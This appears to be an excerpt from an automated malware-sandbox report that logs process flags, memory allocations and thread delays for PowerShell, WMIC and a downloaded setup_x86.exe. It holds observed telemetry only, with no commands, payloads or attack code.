Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Downloads\setup_x86.exe	Memory allocated: 1F318460000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Memory allocated: 1F330620000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3816	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6039	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Window / User API: threadDelayed 5413	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Window / User API: threadDelayed 4261	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6617	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3095	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2074	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 849	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4028
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 571
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4370
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 534

